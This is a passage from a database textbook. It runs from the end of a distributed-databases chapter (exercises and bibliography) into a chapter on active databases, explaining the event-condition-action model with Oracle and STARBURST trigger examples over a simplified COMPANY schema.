b. List the steps that you would have to go through under each alternative from the present situation until global applications are viable.

c. Compare these two alternatives with respect to:
i. design-time considerations
ii. runtime considerations

Selected Bibliography
The textbooks by Ceri and Pelagatti (1984a) and Ozsu and Valduriez (1999) are devoted to distributed databases. Peterson and Davie (2008), Tannenbaum (2003), and Stallings (2007) cover data communications and computer networks. Comer (2008) discusses networks and internets. Ozsu et al. (1994) has a collection of papers on distributed object management.

Most of the research on distributed database design, query processing, and optimization occurred in the 1980s and 1990s; we quickly review the important references here. Distributed database design has been addressed in terms of horizontal and vertical fragmentation, allocation, and replication. Ceri et al. (1982) defined the concept of minterm horizontal fragments. Ceri et al. (1983) developed an integer programming-based optimization model for horizontal fragmentation and allocation. Navathe et al. (1984) developed algorithms for vertical fragmentation based on attribute affinity and showed a variety of contexts for vertical fragment allocation. Wilson and Navathe (1986) present an analytical model for optimal allocation of fragments. Elmasri et al. (1987) discuss fragmentation for the ECR model; Karlapalem et al. (1996) discuss issues for distributed design of object databases. Navathe et al. (1996) discuss mixed fragmentation by combining horizontal and vertical fragmentation; Karlapalem et al. (1996) present a model for redesign of distributed databases. Distributed query processing, optimization, and decomposition are discussed in Hevner and Yao (1979), Kerschberg et al. (1982), Apers et al. (1983), Ceri and Pelagatti (1984), and Bodorick et al. (1992).
Bernstein and Goodman (1981) discuss the theory behind semijoin processing. Wong (1983) discusses the use of relationships in relation fragmentation. Concurrency control and recovery schemes are discussed in Bernstein and Goodman (1981a). Kumar and Hsu (1998) compiles some articles related to recovery in distributed databases. Elections in distributed systems are discussed in Garcia-Molina (1982). Lamport (1978) discusses problems with generating unique timestamps in a distributed system. Rahimi and Haug (2007) discuss a more flexible way to construct query critical metadata for P2P databases. Ouzzani and Bouguettaya (2004) outline fundamental problems in distributed query processing over Web-based data sources.

A concurrency control technique for replicated data that is based on voting is presented by Thomas (1979). Gifford (1979) proposes the use of weighted voting, and Paris (1986) describes a method called voting with witnesses. Jajodia and Mutchler (1990) discuss dynamic voting. A technique called available copy is proposed by Bernstein and Goodman (1984), and one that uses the idea of a group is presented in ElAbbadi and Toueg (1988). Other work that discusses replicated data includes Gladney (1989), Agrawal and ElAbbadi (1990), ElAbbadi and Toueg (1989), Kumar and Segev (1993), Mukkamala (1989), and Wolfson and Milo (1991). Bassiouni (1988) discusses optimistic protocols for DDB concurrency control. Garcia-Molina (1983) and Kumar and Stonebraker (1987) discuss techniques that use the semantics of the transactions. Distributed concurrency control techniques based on locking and distinguished copies are presented by Menasce et al. (1980) and Minoura and Wiederhold (1982). Obermark (1982) presents algorithms for distributed deadlock detection. In more recent work, Vadivelu et al. (2008) propose using backup mechanisms and multilevel security to develop algorithms for improving concurrency. Madria et al. (2007) propose a mechanism based on a multiversion two-phase locking scheme and timestamping to address concurrency issues specific to mobile database systems. Boukerche and Tuck (2001) propose a technique that allows transactions to be out of order to a limited extent. They attempt to ease the load on the application developer by exploiting the network environment and producing a schedule equivalent to a temporally ordered serial schedule. Han et al. (2004) propose a deadlock-free and serializable extended Petri net model for Web-based distributed real-time databases.

A survey of recovery techniques in distributed systems is given by Kohler (1981). Reed (1983) discusses atomic actions on distributed data. Bhargava (1987) presents an edited compilation of various approaches and techniques for concurrency and reliability in distributed systems.

Federated database systems were first defined in McLeod and Heimbigner (1985). Techniques for schema integration in federated databases are presented by Elmasri et al. (1986), Batini et al. (1987), Hayne and Ram (1990), and Motro (1987). Elmagarmid and Helal (1988) and Gamal-Eldin et al. (1988) discuss the update problem in heterogeneous DDBSs. Heterogeneous distributed database issues are discussed in Hsiao and Kamel (1989). Sheth and Larson (1990) present an exhaustive survey of federated database management. Since the late 1980s, multidatabase systems and interoperability have become important topics.
Techniques for dealing with semantic incompatibilities among multiple databases are examined in DeMichiel (1989), Siegel and Madnick (1991), Krishnamurthy et al. (1991), and Wang and Madnick (1989). Castano et al. (1998) present an excellent survey of techniques for analysis of schemas. Pitoura et al. (1995) discuss object orientation in multidatabase systems. Xiao et al. (2003) propose an XML-based model for a common data model for multidatabase systems and present a new approach for schema mapping based on this model. Lakshmanan et al. (2001) propose extending SQL for interoperability and describe the architecture and algorithms for achieving the same.

Transaction processing in multidatabases is discussed in Mehrotra et al. (1992), Georgakopoulos et al. (1991), Elmagarmid et al. (1990), and Brietbart et al. (1990), among others. Elmagarmid (1992) discusses transaction processing for advanced applications, including the engineering applications discussed in Heiler et al. (1992). Workflow systems, which are becoming popular for managing information in complex organizations, use multilevel and nested transactions in conjunction with distributed databases. Weikum (1991) discusses multilevel transaction management. Alonso et al. (1997) discuss limitations of current workflow systems. Lopes et al. (2009) propose that users define and execute their own workflows using a client-side Web browser. They attempt to leverage Web 2.0 trends to simplify the user's work for workflow management. Jung and Yeom (2008) exploit data workflow to develop an improved transaction management system that provides simultaneous, transparent access to the heterogeneous storages that constitute the HVEM DataGrid. Deelman and Chervanak (2008) list the challenges in data-intensive scientific workflows. Specifically, they look at automated management of data, efficient mapping techniques, and user feedback issues in workflow mapping. They also argue for data reuse as an efficient means to manage data and present the challenges therein.

A number of experimental distributed DBMSs have been implemented. These include distributed INGRES by Epstein et al. (1978), DDTS by Devor and Weeldreyer (1980), SDD-1 by Rothnie et al. (1980), System R* by Lindsay et al. (1984), SIRIUS-DELTA by Ferrier and Stangret (1982), and MULTIBASE by Smith et al. (1981). The OMNIBASE system by Rusinkiewicz et al. (1988) and the Federated Information Base developed using the Candide data model by Navathe et al. (1994) are examples of federated DDBMSs. Pitoura et al. (1995) present a comparative survey of the federated database system prototypes. Most commercial DBMS vendors have products using the client-server approach and offer distributed versions of their systems. Some system issues concerning client-server DBMS architectures are discussed in Carey et al. (1991), DeWitt et al. (1990), and Wang and Rowe (1991). Khoshafian et al. (1992) discuss design issues for relational DBMSs in the client-server environment. Client-server management issues are discussed in many books, such as Zantinge and Adriaans (1996). Di Stefano (2005) discusses data distribution issues specific to grid computing. A major part of this discussion may also apply to cloud computing.
Figure A.1
Schema diagram for the COMPANY relational database schema:
EMPLOYEE(Fname, Minit, Lname, Ssn, Bdate, Address, Sex, Salary, Super_ssn, Dno)
DEPARTMENT(Dname, Dnumber, Mgr_ssn, Mgr_start_date)
DEPT_LOCATIONS(Dnumber, Dlocation)
PROJECT(Pname, Pnumber, Plocation, Dnum)
WORKS_ON(Essn, Pno, Hours)
DEPENDENT(Essn, Dependent_name, Sex, Bdate, Relationship)

Figure A.2
One possible database state for the COMPANY relational database schema.

Enhanced Data Models for Advanced Applications

From Chapter 26 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-Wesley. All rights reserved.

As the use of database systems has grown, users have demanded additional functionality from these software packages, with the purpose of making it easier to implement more advanced and complex user applications. Object-oriented databases and object-relational systems do provide features that allow users to extend their systems by specifying additional abstract data types for each application. However, it is quite useful to identify certain common features for some of these advanced applications and to create models that can represent them. Additionally, specialized storage structures and indexing methods can be implemented to improve the performance of these common features. The features can then be implemented as abstract data types or class libraries and purchased separately from the basic DBMS software package. The term data blade has been used in Informix and cartridge in Oracle to refer to such optional submodules that can be included in a DBMS (database management system) package. Users can utilize these features directly if they are suitable for their applications, without having to reinvent, reimplement, and reprogram such common features. This chapter introduces database concepts for some of the common features that are needed by advanced applications and are being used widely.
We will cover active rules that are used in active database applications, temporal concepts that are used in temporal database applications, and, briefly, some of the issues involving spatial databases and multimedia databases. We will also discuss deductive databases. It is important to note that each of these topics is very broad, and we give only a brief introduction to each. In fact, each of these areas can serve as the sole topic of a complete book.

In Section 1 we introduce the topic of active databases, which provide additional functionality for specifying active rules. These rules can be automatically triggered by events that occur, such as database updates or certain times being reached, and can initiate certain actions that have been specified in the rule declaration to occur if certain conditions are met. Many commercial packages include some of the functionality provided by active databases in the form of triggers. Triggers are now part of the SQL-99 and later standards.

In Section 2 we introduce the concepts of temporal databases, which permit the database system to store a history of changes and allow users to query both current and past states of the database. Some temporal database models also allow users to store future expected information, such as planned schedules. It is important to note that many database applications are temporal, but they are often implemented without much temporal support from the DBMS package; that is, the temporal concepts are implemented in the application programs that access the database.

Section 3 gives a brief overview of spatial database concepts. We discuss types of spatial data, different kinds of spatial analyses, operations on spatial data, types of spatial queries, spatial data indexing, spatial data mining, and applications of spatial databases.

Section 4 is devoted to multimedia database concepts. Multimedia databases provide features that allow users to store and query different types of multimedia information, which includes images (such as pictures and drawings), video clips (such as movies, newsreels, and home videos), audio clips (such as songs, phone messages, and speeches), and documents (such as books and articles). We discuss automatic analysis of images, object recognition in images, and semantic tagging of images.

In Section 5 we discuss deductive databases,1 an area that is at the intersection of databases, logic, and artificial intelligence or knowledge bases. A deductive database system includes capabilities to define (deductive) rules, which can deduce or infer additional information from the facts that are stored in a database. Because part of the theoretical foundation for some deductive database systems is mathematical logic, such systems are often referred to as logic databases. Other types of systems, referred to as expert database systems or knowledge-based systems, also incorporate reasoning and inferencing capabilities; such systems use techniques that were developed in the field of artificial intelligence, including semantic networks, frames, production systems, or rules for capturing domain-specific knowledge.

Section 6 summarizes the chapter.
Readers may choose to peruse the particular topics they are interested in, as the sections in this chapter are practically independent of one another.

1Section 5 is only a summary of Deductive Databases; a chapter by this author is in a prior edition.

1 Active Database Concepts and Triggers
Rules that specify actions that are automatically triggered by certain events have been considered important enhancements to database systems for quite some time. In fact, the concept of triggers—a technique for specifying certain types of active rules—has existed in early versions of the SQL specification for relational databases, and triggers are now part of the SQL-99 and later standards. Commercial relational DBMSs—such as Oracle, DB2, and Microsoft SQL Server—have various versions of triggers available. However, much research into what a general model for active databases should look like has been done since the early models of triggers were proposed. In Section 1.1 we will present the general concepts that have been proposed for specifying rules for active databases. We will use the syntax of the Oracle commercial relational DBMS to illustrate these concepts with specific examples, since Oracle triggers are close to the way rules are specified in the SQL standard. Section 1.2 will discuss some general design and implementation issues for active databases. We give examples of how active databases are implemented in the STARBURST experimental DBMS in Section 1.3, since STARBURST provides for many of the concepts of generalized active databases within its framework. Section 1.4 discusses possible applications of active databases. Finally, Section 1.5 describes how triggers are declared in the SQL-99 standard.

1.1 Generalized Model for Active Databases and Oracle Triggers
The model that has been used to specify active database rules is referred to as the Event-Condition-Action (ECA) model. A rule in the ECA model has three components:

1. The event(s) that triggers the rule: These events are usually database update operations that are explicitly applied to the database. However, in the general model, they could also be temporal events2 or other kinds of external events.

2. The condition that determines whether the rule action should be executed: Once the triggering event has occurred, an optional condition may be evaluated. If no condition is specified, the action will be executed once the event occurs. If a condition is specified, it is first evaluated, and only if it evaluates to true will the rule action be executed.

3. The action to be taken: The action is usually a sequence of SQL statements, but it could also be a database transaction or an external program that will be automatically executed.

2An example would be a temporal event specified as a periodic time, such as: Trigger this rule every day at 5:30 A.M.

Figure 1
A simplified COMPANY database used for active rule examples:
EMPLOYEE(Name, Ssn, Salary, Dno, Supervisor_ssn)
DEPARTMENT(Dname, Dno, Total_sal, Manager_ssn)

Let us consider some examples to illustrate these concepts. The examples are based on a much simplified variation of a COMPANY database application shown in Figure 1, with each employee having a name (Name), Social Security number (Ssn), salary (Salary), department to which they are currently assigned (Dno, a foreign key to DEPARTMENT), and a direct supervisor (Supervisor_ssn, a (recursive) foreign key to EMPLOYEE).
For this example, we assume that NULL is allowed for Dno, indicating that an employee may be temporarily unassigned to any department. Each department has a name (Dname), number (Dno), the total salary of all employees assigned to the department (Total_sal), and a manager (Manager_ssn, which is a foreign key to EMPLOYEE).

Notice that the Total_sal attribute is really a derived attribute, whose value should be the sum of the salaries of all employees who are assigned to the particular department. Maintaining the correct value of such a derived attribute can be done via an active rule. First we have to determine the events that may cause a change in the value of Total_sal, which are as follows:

1. Inserting (one or more) new employee tuples
2. Changing the salary of (one or more) existing employees
3. Changing the assignment of existing employees from one department to another
4. Deleting (one or more) employee tuples

In the case of event 1, we only need to recompute Total_sal if the new employee is immediately assigned to a department—that is, if the value of the Dno attribute for the new employee tuple is not NULL (assuming NULL is allowed for Dno). Hence, this would be the condition to be checked. A similar condition could be checked for event 2 (and 4) to determine whether the employee whose salary is changed (or who is being deleted) is currently assigned to a department. For event 3, we will always execute an action to maintain the value of Total_sal correctly, so no condition is needed (the action is always executed).

The action for events 1, 2, and 4 is to automatically update the value of Total_sal for the employee's department to reflect the newly inserted, updated, or deleted employee's salary. In the case of event 3, a twofold action is needed: one to update the Total_sal of the employee's old department and the other to update the Total_sal of the employee's new department.

The four active rules (or triggers) R1, R2, R3, and R4—corresponding to the above situation—can be specified in the notation of the Oracle DBMS as shown in Figure 2(a). Let us consider rule R1 to illustrate the syntax of creating triggers in Oracle.

(a) R1: CREATE TRIGGER Total_sal1
        AFTER INSERT ON EMPLOYEE
        FOR EACH ROW
        WHEN ( NEW.Dno IS NOT NULL )
            UPDATE DEPARTMENT
            SET Total_sal = Total_sal + NEW.Salary
            WHERE Dno = NEW.Dno;

    R2: CREATE TRIGGER Total_sal2
        AFTER UPDATE OF Salary ON EMPLOYEE
        FOR EACH ROW
        WHEN ( NEW.Dno IS NOT NULL )
            UPDATE DEPARTMENT
            SET Total_sal = Total_sal + NEW.Salary - OLD.Salary
            WHERE Dno = NEW.Dno;

    R3: CREATE TRIGGER Total_sal3
        AFTER UPDATE OF Dno ON EMPLOYEE
        FOR EACH ROW
        BEGIN
            UPDATE DEPARTMENT
            SET Total_sal = Total_sal + NEW.Salary
            WHERE Dno = NEW.Dno;
            UPDATE DEPARTMENT
            SET Total_sal = Total_sal - OLD.Salary
            WHERE Dno = OLD.Dno;
        END;

    R4: CREATE TRIGGER Total_sal4
        AFTER DELETE ON EMPLOYEE
        FOR EACH ROW
        WHEN ( OLD.Dno IS NOT NULL )
            UPDATE DEPARTMENT
            SET Total_sal = Total_sal - OLD.Salary
            WHERE Dno = OLD.Dno;

(b) R5: CREATE TRIGGER Inform_supervisor1
        BEFORE INSERT OR UPDATE OF Salary, Supervisor_ssn ON EMPLOYEE
        FOR EACH ROW
        WHEN ( NEW.Salary > ( SELECT Salary FROM EMPLOYEE
                              WHERE Ssn = NEW.Supervisor_ssn ) )
            inform_supervisor(NEW.Supervisor_ssn, NEW.Ssn);

Figure 2
Specifying active rules as triggers in Oracle notation. (a) Triggers for automatically maintaining the consistency of Total_sal of DEPARTMENT. (b) Trigger for comparing an employee's salary with that of his or her supervisor.


The CREATE TRIGGER statement specifies a trigger (or active rule) name—
Total_sal1 for R1. The AFTER clause specifies that the rule will be triggered after the
events that trigger the rule occur. The triggering events—an insert of a new
employee in this example—are specified following the AFTER keyword.3

The ON clause specifies the relation on which the rule is specified—EMPLOYEE for
R1. The optional keywords FOR EACH ROW specify that the rule will be triggered
once for each row that is affected by the triggering event.4

The optional WHEN clause is used to specify any conditions that need to be checked
after the rule is triggered, but before the action is executed. Finally, the action(s) to
be taken is (are) specified as a PL/SQL block, which typically contains one or more
SQL statements or calls to execute external procedures.

The four triggers (active rules) R1, R2, R3, and R4 illustrate a number of features of
active rules. First, the basic events that can be specified for triggering the rules are
the standard SQL update commands: INSERT, DELETE, and UPDATE. They are spec-
ified by the keywords INSERT, DELETE, and UPDATE in Oracle notation. In the case
of UPDATE, one may specify the attributes to be updated—for example, by writing
UPDATE OF Salary, Dno. Second, the rule designer needs to have a way to refer to the
tuples that have been inserted, deleted, or modified by the triggering event. The key-
words NEW and OLD are used in Oracle notation; NEW is used to refer to a newly
inserted or newly updated tuple, whereas OLD is used to refer to a deleted tuple or to
a tuple before it was updated.

Thus, rule R1 is triggered after an INSERT operation is applied to the EMPLOYEE
relation. In R1, the condition (NEW.Dno IS NOT NULL) is checked, and if it evaluates
to true, meaning that the newly inserted employee tuple is related to a department,
then the action is executed. The action updates the DEPARTMENT tuple(s) related to
the newly inserted employee by adding their salary (NEW.Salary) to the Total_sal
attribute of their related department.

Rule R2 is similar to R1, but it is triggered by an UPDATE operation that updates the
SALARY of an employee rather than by an INSERT. Rule R3 is triggered by an update
to the Dno attribute of EMPLOYEE, which signifies changing an employee’s assign-
ment from one department to another. There is no condition to check in R3, so the
action is executed whenever the triggering event occurs. The action updates both
the old department and new department of the reassigned employees by adding
their salary to Total_sal of their new department and subtracting their salary from
Total_sal of their old department. Note that this should work even if the value of Dno
is NULL, because in this case no department will be selected for the rule action.5

3As we will see, it is also possible to specify BEFORE instead of AFTER, which indicates that the rule is
triggered before the triggering event is executed.
4Again, we will see that an alternative is to trigger the rule only once even if multiple rows (tuples) are
affected by the triggering event.
5R1, R2, and R4 can also be written without a condition. However, it may be more efficient to execute
them with the condition since the action is not invoked unless it is required.


<trigger> ::= CREATE TRIGGER <trigger name>
              ( AFTER | BEFORE ) <triggering events> ON <table name>
              [ FOR EACH ROW ]
              [ WHEN <condition> ]
              <trigger action> ;
<triggering events> ::= <trigger event> { OR <trigger event> }
<trigger event> ::= INSERT | DELETE | UPDATE [ OF <column name> { , <column name> } ]
<trigger action> ::= <PL/SQL block>

Figure 3
A syntax summary for specifying triggers in the Oracle system (main options only).

It is important to note the effect of the optional FOR EACH ROW clause, which sig-
nifies that the rule is triggered separately for each tuple. This is known as a row-level
trigger. If this clause was left out, the trigger would be known as a statement-level
trigger and would be triggered once for each triggering statement. To see the differ-
ence, consider the following update operation, which gives a 10 percent raise to all
employees assigned to department 5. This operation would be an event that triggers
rule R2:

UPDATE EMPLOYEE
SET Salary = 1.1 * Salary
WHERE Dno = 5;

Because the above statement could update multiple records, a rule using row-level
semantics, such as R2 in Figure 2, would be triggered once for each row, whereas a
rule using statement-level semantics is triggered only once. The Oracle system allows
the user to choose which of the above options is to be used for each rule. Including
the optional FOR EACH ROW clause creates a row-level trigger, and leaving it out
creates a statement-level trigger. Note that the keywords NEW and OLD can only be
used with row-level triggers.
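
To contrast with the row-level triggers of Figure 2, the following is a minimal sketch of a statement-level trigger in Oracle notation. The AUDIT_LOG table and its columns are hypothetical and not part of the COMPANY schema. Because FOR EACH ROW is omitted, the trigger fires only once per triggering UPDATE statement, no matter how many employee rows are affected, and it cannot refer to NEW or OLD.

CREATE TRIGGER Log_salary_update
AFTER UPDATE OF Salary ON EMPLOYEE
BEGIN
    -- one log record per triggering statement, not per affected row
    INSERT INTO AUDIT_LOG (Log_time, Description)
    VALUES (SYSDATE, 'Salary update applied to EMPLOYEE');
END;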

As a second example, suppose we want to check whenever an employee’s salary is
greater than the salary of his or her direct supervisor. Several events can trigger this
rule: inserting a new employee, changing an employee’s salary, or changing an
employee’s supervisor. Suppose that the action to take would be to call an external
procedure inform_supervisor,6 which will notify the supervisor. The rule could then
be written as in R5 (see Figure 2(b)).

Figure 3 shows the syntax for specifying some of the main options available in
Oracle triggers. We will describe the syntax for triggers in the SQL-99 standard in
Section 1.5.

6Assuming that an appropriate external procedure has been declared. This is a feature that is available in
SQL-99 and later standards.


1.2 Design and Implementation Issues
for Active Databases

The previous section gave an overview of some of the main concepts for specifying
active rules. In this section, we discuss some additional issues concerning how rules
are designed and implemented. The first issue concerns activation, deactivation,
and grouping of rules. In addition to creating rules, an active database system
should allow users to activate, deactivate, and drop rules by referring to their rule
names. A deactivated rule will not be triggered by the triggering event. This feature
allows users to selectively deactivate rules for certain periods of time when they are
not needed. The activate command will make the rule active again. The drop com-
mand deletes the rule from the system. Another option is to group rules into named
rule sets, so the whole set of rules can be activated, deactivated, or dropped. It is also
useful to have a command that can trigger a rule or rule set via an explicit PROCESS
RULES command issued by the user.
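
As a concrete illustration, Oracle supports deactivating, reactivating, and dropping individual triggers by name (grouping rules into named rule sets and the explicit PROCESS RULES command described above are not part of standard SQL). Using the triggers of Figure 2:

-- Deactivate a trigger temporarily; it will not fire while disabled
ALTER TRIGGER Total_sal1 DISABLE;

-- Reactivate it
ALTER TRIGGER Total_sal1 ENABLE;

-- Remove it from the system entirely
DROP TRIGGER Total_sal1;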

The second issue concerns whether the triggered action should be executed before,
after, instead of, or concurrently with the triggering event. A before trigger executes
the trigger before executing the event that caused the trigger. It can be used in appli-
cations such as checking for constraint violations. An after trigger executes the trig-
ger after executing the event, and it can be used in applications such as maintaining
derived data and monitoring for specific events and conditions. An instead of trig-
ger executes the trigger instead of executing the event, and it can be used in applica-
tions such as executing corresponding updates on base relations in response to an
event that is an update of a view.
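
As an illustration of the instead of option, the following sketch, written in the simplified Oracle-style notation of Figure 2, defines a hypothetical view EMP_DEPT and routes an update of the view to the EMPLOYEE base table. The view name and the routing choice are assumptions for illustration only.

CREATE VIEW EMP_DEPT AS
    SELECT E.Ssn, E.Name, E.Salary, D.Dname
    FROM EMPLOYEE E, DEPARTMENT D
    WHERE E.Dno = D.Dno;

CREATE TRIGGER Emp_dept_update
INSTEAD OF UPDATE ON EMP_DEPT
FOR EACH ROW
BEGIN
    -- apply the view update to the base relation that actually stores the salary
    UPDATE EMPLOYEE
    SET Salary = NEW.Salary
    WHERE Ssn = NEW.Ssn;
END;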

A related issue is whether the action being executed should be considered as a separate
transaction or whether it should be part of the same transaction that triggered the
rule. We will try to categorize the various options. It is important to note that not all
options may be available for a particular active database system. In fact, most com-
mercial systems are limited to one or two of the options that we will now discuss.

Let us assume that the triggering event occurs as part of a transaction execution. We
should first consider the various options for how the triggering event is related to
the evaluation of the rule’s condition. The rule condition evaluation is also known as
rule consideration, since the action is to be executed only after considering whether
the condition evaluates to true or false. There are three main possibilities for rule
consideration:

1. Immediate consideration. The condition is evaluated as part of the same
transaction as the triggering event, and is evaluated immediately. This case
can be further categorized into three options:
■ Evaluate the condition before executing the triggering event.
■ Evaluate the condition after executing the triggering event.
■ Evaluate the condition instead of executing the triggering event.

2. Deferred consideration. The condition is evaluated at the end of the trans-
action that included the triggering event. In this case, there could be many
triggered rules waiting to have their conditions evaluated.


3. Detached consideration. The condition is evaluated as a separate transac-
tion, spawned from the triggering transaction.

The next set of options concerns the relationship between evaluating the rule condi-
tion and executing the rule action. Here, again, three options are possible:
immediate, deferred, or detached execution. Most active systems use the first
option. That is, as soon as the condition is evaluated, if it returns true, the action is
immediately executed.

The Oracle system (see Section 1.1) uses the immediate consideration model, but it
allows the user to specify for each rule whether the before or after option is to be
used with immediate condition evaluation. It also uses the immediate execution
model. The STARBURST system (see Section 1.3) uses the deferred consideration
option, meaning that all rules triggered by a transaction wait until the triggering
transaction reaches its end and issues its COMMIT WORK command before the rule
conditions are evaluated.7

Another issue concerning active database rules is the distinction between row-level
rules and statement-level rules. Because SQL update statements (which act as trig-
gering events) can specify a set of tuples, one has to distinguish between whether the
rule should be considered once for the whole statement or whether it should be con-
sidered separately for each row (that is, tuple) affected by the statement. The SQL-99
standard (see Section 1.5) and the Oracle system (see Section 1.1) allow the user to
choose which of the options is to be used for each rule, whereas STARBURST uses
statement-level semantics only. We will give examples of how statement-level trig-
gers can be specified in Section 1.3.

One of the difficulties that may have limited the widespread use of active rules, in
spite of their potential to simplify database and software development, is that there
are no easy-to-use techniques for designing, writing, and verifying rules. For exam-
ple, it is quite difficult to verify that a set of rules is consistent, meaning that two or
more rules in the set do not contradict one another. It is also difficult to guarantee
termination of a set of rules under all circumstances. To illustrate the termination

R1: CREATE TRIGGER T1
AFTER INSERT ON TABLE1
FOR EACH ROW

UPDATE TABLE2
SET Attribute1 = … ;

R2: CREATE TRIGGER T2
AFTER UPDATE OF Attribute1 ON TABLE2
FOR EACH ROW

INSERT INTO TABLE1 VALUES ( … );

Figure 4
An example to illus-
trate the termination
problem for active
rules.

7STARBURST also allows the user to start rule consideration explicitly via a PROCESS RULES com-
mand.


problem briefly, consider the rules in Figure 4. Here, rule R1 is triggered by an
INSERT event on TABLE1 and its action includes an update event on Attribute1 of
TABLE2. However, rule R2’s triggering event is an UPDATE event on Attribute1 of
TABLE2, and its action includes an INSERT event on TABLE1. In this example, it is
easy to see that these two rules can trigger one another indefinitely, leading to non-
termination. However, if dozens of rules are written, it is very difficult to determine
whether termination is guaranteed or not.

If active rules are to reach their potential, it is necessary to develop tools for the
design, debugging, and monitoring of active rules that can help users design and
debug their rules.

1.3 Examples of Statement-Level Active Rules
in STARBURST

We now give some examples to illustrate how rules can be specified in the STAR-
BURST experimental DBMS. This will allow us to demonstrate how statement-level
rules can be written, since these are the only types of rules allowed in STARBURST.

The three active rules R1S, R2S, and R3S in Figure 5 correspond to the first three
rules in Figure 2, but they use STARBURST notation and statement-level semantics.
We can explain the rule structure using rule R1S. The CREATE RULE statement
specifies a rule name—Total_sal1 for R1S. The ON clause specifies the relation on
which the rule is specified—EMPLOYEE for R1S. The WHEN clause is used to spec-
ify the events that trigger the rule.8 The optional IF clause is used to specify any
conditions that need to be checked. Finally, the THEN clause is used to specify the
actions to be taken, which are typically one or more SQL statements.

In STARBURST, the basic events that can be specified for triggering the rules are the
standard SQL update commands: INSERT, DELETE, and UPDATE. These are speci-
fied by the keywords INSERTED, DELETED, and UPDATED in STARBURST nota-
tion. Second, the rule designer needs to have a way to refer to the tuples that have
been modified. The keywords INSERTED, DELETED, NEW-UPDATED, and OLD-
UPDATED are used in STARBURST notation to refer to four transition tables (rela-
tions) that include the newly inserted tuples, the deleted tuples, the updated tuples
before they were updated, and the updated tuples after they were updated, respec-
tively. Obviously, depending on the triggering events, only some of these transition
tables may be available. The rule writer can refer to these tables when writing the
condition and action parts of the rule. Transition tables contain tuples of the same
type as those in the relation specified in the ON clause of the rule—for R1S, R2S,
and R3S, this is the EMPLOYEE relation.

In statement-level semantics, the rule designer can only refer to the transition tables
as a whole and the rule is triggered only once, so the rules must be written differ-
ently than for row-level semantics. Because multiple employee tuples may be

8Note that the WHEN keyword specifies events in STARBURST but is used to specify the rule condition
in SQL and Oracle triggers.


R1S: CREATE RULE Total_sal1 ON EMPLOYEE
     WHEN INSERTED
     IF EXISTS ( SELECT * FROM INSERTED WHERE Dno IS NOT NULL )
     THEN UPDATE DEPARTMENT AS D
          SET D.Total_sal = D.Total_sal +
              ( SELECT SUM (I.Salary) FROM INSERTED AS I WHERE D.Dno = I.Dno )
          WHERE D.Dno IN ( SELECT Dno FROM INSERTED );

R2S: CREATE RULE Total_sal2 ON EMPLOYEE
     WHEN UPDATED ( Salary )
     IF EXISTS ( SELECT * FROM NEW-UPDATED WHERE Dno IS NOT NULL )
        OR EXISTS ( SELECT * FROM OLD-UPDATED WHERE Dno IS NOT NULL )
     THEN UPDATE DEPARTMENT AS D
          SET D.Total_sal = D.Total_sal +
              ( SELECT SUM (N.Salary) FROM NEW-UPDATED AS N WHERE D.Dno = N.Dno ) -
              ( SELECT SUM (O.Salary) FROM OLD-UPDATED AS O WHERE D.Dno = O.Dno )
          WHERE D.Dno IN ( SELECT Dno FROM NEW-UPDATED ) OR
                D.Dno IN ( SELECT Dno FROM OLD-UPDATED );

R3S: CREATE RULE Total_sal3 ON EMPLOYEE
     WHEN UPDATED ( Dno )
     THEN UPDATE DEPARTMENT AS D
          SET D.Total_sal = D.Total_sal +
              ( SELECT SUM (N.Salary) FROM NEW-UPDATED AS N WHERE D.Dno = N.Dno )
          WHERE D.Dno IN ( SELECT Dno FROM NEW-UPDATED );
          UPDATE DEPARTMENT AS D
          SET D.Total_sal = Total_sal -
              ( SELECT SUM (O.Salary) FROM OLD-UPDATED AS O WHERE D.Dno = O.Dno )
          WHERE D.Dno IN ( SELECT Dno FROM OLD-UPDATED );

Figure 5
Active rules using statement-level semantics in STARBURST notation.

inserted in a single insert statement, we have to check if at least one of the newly
inserted employee tuples is related to a department. In R1S, the condition

EXISTS (SELECT * FROM INSERTED WHERE Dno IS NOT NULL )

is checked, and if it evaluates to true, then the action is executed. The action updates
in a single statement the DEPARTMENT tuple(s) related to the newly inserted
employee(s) by adding their salaries to the Total_sal attribute of each related depart-
ment. Because more than one newly inserted employee may belong to the same


department, we use the SUM aggregate function to ensure that all their salaries are
added.

Rule R2S is similar to R1S, but is triggered by an UPDATE operation that updates the
salary of one or more employees rather than by an INSERT. Rule R3S is triggered by
an update to the Dno attribute of EMPLOYEE, which signifies changing one or more
employees’ assignment from one department to another. There is no condition in
R3S, so the action is executed whenever the triggering event occurs.9 The action
updates both the old department(s) and new department(s) of the reassigned
employees by adding their salary to Total_sal of each new department and subtract-
ing their salary from Total_sal of each old department.

In our example, it is more complex to write the statement-level rules than the row-
level rules, as can be illustrated by comparing Figures 2 and 5. However, this is not a
general rule, and other types of active rules may be easier to specify when using
statement-level notation than when using row-level notation.

The execution model for active rules in STARBURST uses deferred consideration.
That is, all the rules that are triggered within a transaction are placed in a set—
called the conflict set—which is not considered for evaluation of conditions and
execution until the transaction ends (by issuing its COMMIT WORK command).
STARBURST also allows the user to explicitly start rule consideration in the middle
of a transaction via an explicit PROCESS RULES command. Because multiple rules
must be evaluated, it is necessary to specify an order among the rules. The syntax for
rule declaration in STARBURST allows the specification of ordering among the
rules to instruct the system about the order in which a set of rules should be consid-
ered.10 Additionally, the transition tables—INSERTED, DELETED, NEW-UPDATED,
and OLD-UPDATED—contain the net effect of all the operations within the transac-
tion that affected each table, since multiple operations may have been applied to
each table during the transaction.

1.4 Potential Applications for Active Databases
We now briefly discuss some of the potential applications of active rules. Obviously,
one important application is to allow notification of certain conditions that occur.
For example, an active database may be used to monitor, say, the temperature of an
industrial furnace. The application can periodically insert in the database the tem-
perature reading records directly from temperature sensors, and active rules can be
written that are triggered whenever a temperature record is inserted, with a condi-
tion that checks if the temperature exceeds the danger level, and results in the action
to raise an alarm.
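
Such a notification rule might look as follows in the Oracle-style notation of Figure 2. The TEMP_READING table, the threshold of 1200 degrees, and the external procedure raise_alarm are hypothetical and would depend on the application.

CREATE TRIGGER Furnace_overheat
AFTER INSERT ON TEMP_READING
FOR EACH ROW
WHEN ( NEW.Temperature > 1200 )
    raise_alarm(NEW.Sensor_id, NEW.Temperature);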

9As in the Oracle examples, rules R1S and R2S can be written without a condition. However, it may be
more efficient to execute them with the condition since the action is not invoked unless it is required.
10If no order is specified between a pair of rules, the system default order is based on placing the rule
declared first ahead of the other rule.


